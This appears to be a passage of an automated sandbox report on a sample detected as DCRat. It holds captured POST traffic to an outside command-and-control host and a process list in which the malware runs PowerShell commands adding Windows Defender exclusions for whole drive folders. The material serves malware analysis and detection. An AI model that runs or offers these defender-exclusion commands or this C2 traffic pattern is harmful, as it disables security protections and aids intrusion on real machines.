                                                      Data Ascii: V[XXVUPR[_RUYXWSWR_^P\V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".+]03R<?;',,W$?'<'#_$]" <2=>0+--$[' \,"
                                                      Dec 13, 2024 14:34:40.652301073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:40.889235973 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      97 | 192.168.2.6 | 50092 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:41.133598089 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:41.485294104 CET | 2568 | OUT | Data Raw: 53 50 5d 52 53 5c 55 5e 5b 5f 52 55 59 5c 57 52 57 5e 5f 5d 50 52 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]RS\U^[_RUY\WRW^_]PRVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!\-,4$$<(X0 U'?#?$$>""/^1>630_-=$[' \,2
                                                      Dec 13, 2024 14:34:42.218734980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:42.811414957 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0
                                                      Dec 13, 2024 14:34:42.811474085 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      98 | 192.168.2.6 | 50093 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:42.811786890 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:43.157130003 CET | 1428 | OUT | Data Raw: 56 5a 58 5f 53 5c 55 5e 5b 5f 52 55 59 59 57 5b 57 53 5f 59 50 58 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX_S\U^[_RUYYW[WS_YPXV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!-3.3R?<$<<T'7]('+[$;9X413$>5'> /$[' \,
                                                      Dec 13, 2024 14:34:43.898303986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:44.137187004 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5e 2b 29 02 0a 32 2b 2c 1c 27 2e 3d 5f 29 11 0f 5f 3a 59 2c 13 26 37 23 1d 3c 30 2e 55 2a 37 2b 59 3e 20 26 00 21 2f 02 1c 39 36 2f 5f 0d 11 3b 06 37 2e 2a 5b 2c 5b 24 01 28 2e 25 17 28 59 21 5e 2a 00 33 01 30 02 22 1e 26 5b 26 51 28 2a 20 0d 3f 05 2c 5a 3a 02 3e 04 24 35 2f 57 0d 1e 27 51 3f 0c 3d 58 20 01 34 5f 21 13 25 59 2a 34 2a 57 36 3a 2b 5c 31 00 39 5e 31 12 27 0c 20 0d 2b 04 27 23 20 0a 24 07 27 55 25 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'^+)2+,'.=_)_:Y,&7#<0.U*7+Y> &!/96/_;7.*[,[$(.%(Y!^*30"&[&Q(* ?,Z:>$5/W'Q?=X 4_!%Y*4*W6:+\19^1' +'# $'U%?.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      99 | 192.168.2.6 | 50094 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:42.915612936 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:43.266520977 CET | 2568 | OUT | Data Raw: 56 5a 58 59 53 5c 50 53 5b 5f 52 55 59 5e 57 53 57 5a 5f 5f 50 5b 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZXYS\PS[_RUY^WSWZ__P[V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_9?3$>/<0<S0,((+'89^ 1/[1.5$ [8-$[' \,
                                                      Dec 13, 2024 14:34:44.001555920 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:44.241143942 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      100 | 192.168.2.6 | 50095 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:44.477386951 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:44.829190969 CET | 2568 | OUT | Data Raw: 53 55 58 5f 56 5e 55 52 5b 5f 52 55 59 5e 57 52 57 5e 5f 52 50 5b 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SUX_V^UR[_RUY^WRW^_RP[VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![:3\3.;<,$Y$#0/(*7'_'^7!#^2>>',$[' \,
                                                      Dec 13, 2024 14:34:45.576044083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:45.809547901 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:45 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      101 | 192.168.2.6 | 50096 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:46.109442949 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:46.454021931 CET | 2568 | OUT | Data Raw: 56 57 5d 58 56 5f 50 55 5b 5f 52 55 59 5e 57 5c 57 5a 5f 58 50 5c 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]XV_PU[_RUY^W\WZ_XP\VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.<?_03>,3300;(7<3!^4%=:0._/=$[' \,
                                                      Dec 13, 2024 14:34:47.194482088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:47.429487944 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0



                                                      Target ID:0
                                                      Start time:08:32:06
                                                      Start date:13/12/2024
                                                      Path:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\CPNSQusnwC.exe"
                                                      Imagebase:0x9d0000
                                                      File size:2'670'080 bytes
                                                      MD5 hash:A26ED7DC21BC77F20C0251FA25738D02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:13
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:15
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:18
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:19
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:22
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:24
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:25
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:26
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                                                      Imagebase:0x7ff6b4e00000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff65f7d0000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\PING.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:ping -n 10 localhost
                                                      Imagebase:0x7ff6c9b20000
                                                      File size:22'528 bytes
                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:08:32:25
                                                      Start date:13/12/2024
                                                      Path:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                                                      Imagebase:0x610000
                                                      File size:2'670'080 bytes
                                                      MD5 hash:A26ED7DC21BC77F20C0251FA25738D02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 76%, ReversingLabs
                                                      Has exited:false

                                                      Target ID:33
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
